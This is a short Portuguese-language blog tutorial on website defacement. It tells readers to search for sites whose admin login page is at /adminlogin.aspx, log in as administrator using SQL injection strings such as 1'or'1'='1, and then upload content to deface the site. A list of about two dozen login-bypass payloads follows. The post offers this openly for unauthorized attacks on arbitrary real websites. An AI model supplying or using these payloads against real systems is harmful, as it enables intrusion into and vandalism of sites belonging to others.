Você pode ter visto hackers hackear e defaceing websites, editá-lo com o seu próprio material, makeing post em websites etc Existem muitos métodos de fazer isso, Neste tutorial eu vou mostrar-lhe um muito básicos e simplesmente SQLi (Injeção de Structured Query Language ).uma consulta SQL para ignorar o nome de usuário e senha do administrador e entrar no painel. Quando você está no painel de apenas encontrar uma opção de upload e enviar o seu conteúdo, então desfigurar-lo.Centenas de sites abrirá ter /adminlogin.aspx em sua URL. Selecione qualquer site, e vá ate a área de login dos administradores . Preencha os detalhes como:
Usuário: 1'or'1 '=' 1
Senha: 1'or'1 '=' 1
Use os detalhes de login mencionado acima e você estará no painel de administração de um website. Eu não vai funcionar para todos os sites que você vai encontrar, mas vai trabalhar na maior parte do site.
Outras Consultas injecção:
or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)
0 comentários :
Postar um comentário